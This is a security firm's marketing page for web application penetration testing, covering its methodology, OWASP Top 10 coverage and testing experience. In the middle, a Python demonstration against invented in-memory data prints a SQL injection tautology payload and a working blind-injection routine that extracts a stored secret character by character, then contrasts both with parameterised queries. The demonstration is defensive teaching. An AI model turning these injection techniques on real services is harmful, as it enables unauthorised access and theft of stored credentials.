Web Application Testing

Expert web application testing by CREST and CESG CHECK certified security consultants.

Nettitude provides advice and guidance on how to improve the security of your web application software through its specialist web application testing consultants. Using manual security testing, we identify vulnerabilities across all of the OWASP Top 10. We also provide deeper application logic assessments and assurance for applications hosted internally as well as in the cloud. In many instances, we provide software development guidance to fix application vulnerabilities or write input validation controls to protect the environment from malicious internet users.

Looking for web application testing services?

With the number of web pages on the internet estimated at more than 50 billion, it is evident that more and more data is being taken online. With the advent of big data, organisations are able to capture information across a vast array of resources. From capturing analytics on users' spending patterns through to tracking users' 'likes', big data is transforming our ability to work, play and communicate.

The uniform approach for presenting this data is through a web browser or web-enabled app. Vulnerabilities such as Heartbleed have required IT professionals to take a deeper look at the way data is secured. As applications become more complex and deliver more functionality to users, the opportunity for vulnerabilities becomes all the more prevalent, and web application testing becomes essential to protect the software IP, users' information and the reputation of the product owner.

What can you expect from a professional tester?

Nettitude's web application assessments are designed to review all types of web server, ranging from straightforward WordPress sites through to online banking environments or even control systems for critical national infrastructure. Nettitude focuses on the application logic that has been built into the website and pays particular attention to any aspect of the environment that allows a user to enter input. As well as having some of the most sought-after technical capability in the space, our consultants all possess strong communication skills and can help quantify the risks associated with your web application infrastructure.

What will the test cover?

Web application tests assess an environment for server-side attacks such as SQL injection and blind SQL injection. In addition, tests assess an environment for client-side attacks, such as cross-site scripting exposures that could allow an attacker to manipulate the clients that access your infrastructure. Nettitude assesses the design of a web infrastructure, including the use of cookies and login forms and the way data is encrypted. It also assesses how content is displayed and the error messages returned when invalid pages, commands or input are entered into the environment.

Professional Guidance

Nettitude can provide advice and guidance on how you can improve the security of your web application software. In many instances, we can provide software development services to fix application logic or write input validation controls to protect the environment from malicious internet users.

We can provide comprehensive testing of Web 2.0 environments that make extensive use of AJAX and Flash. Nettitude also delivers tests that assess fat clients and applications developed for mobile devices. Nettitude is a CREST certified organisation with web application certified consultants delivering end-to-end web app testing.

Our Web Application Testing Methodology

Nettitude's web application testing methodology is consistent with the testing methodology for infrastructure-based IT penetration tests. In addition, further elements are conducted as part of the mapping, service identification, vulnerability assessment and exploitation phases.

Nettitude uses a blended approach of open source tools, custom scripts and commercial tools to conduct web application testing. All of our testing is in line with the OWASP Testing Guide v4 (2014) and covers the OWASP Top 10 as a minimum.

As part of a web application test, Nettitude will assess the following elements:

Application Re-Engineering

Authentication Assessment

Session Management

Input Manipulation

Output Manipulation

Information Leakage

Code Review

Web Service & API Testing

  • Approach to testing

    Nettitude tests web services by manipulating the parameters identified in their configuration files (such as the WSDL). These files provide a roadmap of the types of Simple Object Access Protocol (SOAP) requests that a web service is configured to respond to. Web services can still be susceptible to Structured Query Language (SQL), Lightweight Directory Access Protocol (LDAP), operating system (OS) command and XML Path Language (XPath) injection, blind injection and buffer overflows. XML-based resources are frequently deployed without any form of access control. As a consequence, if a web service allows user input to be included in a query, it becomes a strong target for an injection-based attack.

  • Web services can be a gateway for attacks

    Because many web services provide critical business functions, they are a strong target for internet attackers. Web services can also be attacked outside of the operations described in the WSDL configuration file. It is possible to conduct authentication-based attacks, XML structural attacks, XML content-level attacks, HTTP GET parameter/REST attacks and SOAP attachment attacks. All of these attack vectors can allow an attacker to gain access to privileged data and, in the worst case, root/administrator access to the underlying resources.

  • Web service tests

    Nettitude provides web service testing for Apache Axis/Axis2, Zend, Microsoft WCF and Silverlight. We can also test BPEL services, REST, SOAP over HTTP, SOAP over TCP and SOAP over MQ.

    Nettitude provides web service penetration testing based on proven methodologies and techniques. Using a combination of commercial tools, open source tools and in-house scripts, Nettitude's security testers identify your security vulnerabilities before internet attackers find them. Web service penetration testing requires appropriate scoping, so we always undertake diligent scoping to ensure that web service assessments are conducted in accordance with client requirements.
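The injection and blind-injection tests described above (under "What will the test cover?" and "Approach to testing") both come down to one question: does a parameter taken from the request end up inside a query's text? The following is an added example written for this page, not Nettitude's own tooling. It models a web service lookup operation twice, once splicing the parameter into SQL and once binding it, against a constructed in-memory SQLite user table (the users and secrets are invented sample data), and then shows how a boolean-only response is enough to extract a stored value character by character, which is what a blind injection test exercises.

```python
import sqlite3
import string

# Characters the blind extraction routine will try at each position.
CHARSET = string.ascii_letters + string.digits

# Constructed sample data standing in for an application's user store
# (example data only, not taken from any real system).
SAMPLE_USERS = [("alice", "s3cr3t"), ("bob", "hunter2"), ("admin", "Tr0ub4dor")]


def build_db():
    """Create an in-memory SQLite database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, secret) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def lookup_user_vulnerable(conn, username):
    """Model of a web service operation that splices its parameter into SQL.

    The value taken from the request becomes part of the query text, so a
    quote in the input ends the string literal and the rest is parsed as SQL.
    """
    sql = f"SELECT username FROM users WHERE username = '{username}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_user_parameterised(conn, username):
    """The same operation with the parameter bound instead of concatenated.

    The database receives the query text and the value separately, so the
    input can never change the query's structure.
    """
    sql = "SELECT username FROM users WHERE username = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username,))]


def user_exists_vulnerable(conn, username):
    """Boolean-only response of the kind a tester works with in blind injection."""
    return len(lookup_user_vulnerable(conn, username)) > 0


def extract_secret_blind(conn, target, charset=CHARSET, max_len=32):
    """Recover `target`'s secret one character at a time from yes/no answers.

    Each probe asks whether substr(secret, pos, 1) equals a candidate
    character. The service never returns the secret itself, only whether a
    row matched, which is all a blind injection needs.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # The closing quote is supplied by the vulnerable query template.
            probe = f"{target}' AND substr(secret, {pos}, 1) = '{ch}"
            if user_exists_vulnerable(conn, probe):
                recovered += ch
                break
        else:
            # No candidate matched: end of the secret, or a character outside
            # the charset. Stop here rather than guess.
            break
    return recovered


if __name__ == "__main__":
    db = build_db()
    tautology = "' OR '1'='1"
    print("vulnerable:", lookup_user_vulnerable(db, tautology))
    print("parameterised:", lookup_user_parameterised(db, tautology))
    print("blind extraction:", extract_secret_blind(db, "admin"))
```

Against the vulnerable operation the tautology `' OR '1'='1` returns every user, and the blind routine recovers the admin secret without the service ever displaying it; the parameterised operation returns nothing for either input because the bound value is compared as data, not parsed as SQL. The same distinction applies to the LDAP, OS command and XPath cases named above: the fix is to keep untrusted input out of the query language, not to filter characters after the fact.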

Open Web Application Security Project (OWASP)

The OWASP Top 10 is a list of the most common types of security issues that impact web applications. It is referenced by many security standards and bodies, including PCI DSS, the US Defense Information Systems Agency (DISA), MITRE, the Federal Trade Commission (FTC) and more.

All of Nettitude's web application and penetration testing engagements cover the OWASP Top 10 and are consistent with the OWASP Testing Guide v4 (2014). In addition, Nettitude goes deeper to assess the fundamental application logic, whilst also assessing the access controls that deliver security roles and user partitioning.

Nettitude also pulls in information from external sources such as Facebook, LinkedIn and Twitter to provide social engineering and authentication-based attack vectors. Combining these approaches provides customers with a much more holistic web application security test.

Nettitude carries out web application testing to assess the following elements of the OWASP Top 10 (2013):

A1: Injection

A2: Broken Authentication and Session Management

A3: Cross-Site Scripting (XSS)

A4: Insecure Direct Object References

A5: Security Misconfiguration

A6: Sensitive Data Exposure

A7: Missing Function Level Access Control

A8: Cross-Site Request Forgery (CSRF)

A9: Using Components with Known Vulnerabilities

A10: Unvalidated Redirects and Forwards

The OWASP Top 10 is a strong starting point for web application testing, but organisations should look to go beyond it. The underlying application logic needs to be tested. Websites need to be assessed with different classes of users, to ensure that appropriate partitioning and access controls exist. Content Management Systems (CMS) and administrative functions should be assessed, and a series of broader controls should be reviewed and tested.

Web Application Testing Experience

Nettitude has tested a vast range of applications, from internal applications to external applications delivered over the internet and by mobile/cell phone.

Some of the applications Nettitude has tested include:

Mail applications (Exchange, Domino, Groupwise, Bespoke)

CRM applications

Databases (Sybase, DB2, Oracle, PostgreSQL, MySQL, Microsoft SQL Server, Hadoop, MongoDB)

ERP applications (PeopleSoft, Oracle, SAP)

Financials (Oracle, Sage)

Operating Systems (Windows, Linux, Solaris, AIX, OS/400, Novell, Apple, mainframe derivatives)

IP Telephony (Cisco, Mitel, Alcatel, Nortel, BT, Avaya, SIP based services)

Numerous custom applications in Banking, Insurance, Retail and Manufacturing sectors

Web applications and Web services

Mobile Telephony applications

Apple iOS and Google Android based apps

Wireless environments

Critical infrastructure applications

Smart meters

Intelligent Cyber Security and Risk Management   0345 5200 085    solutions@nettitude.co.uk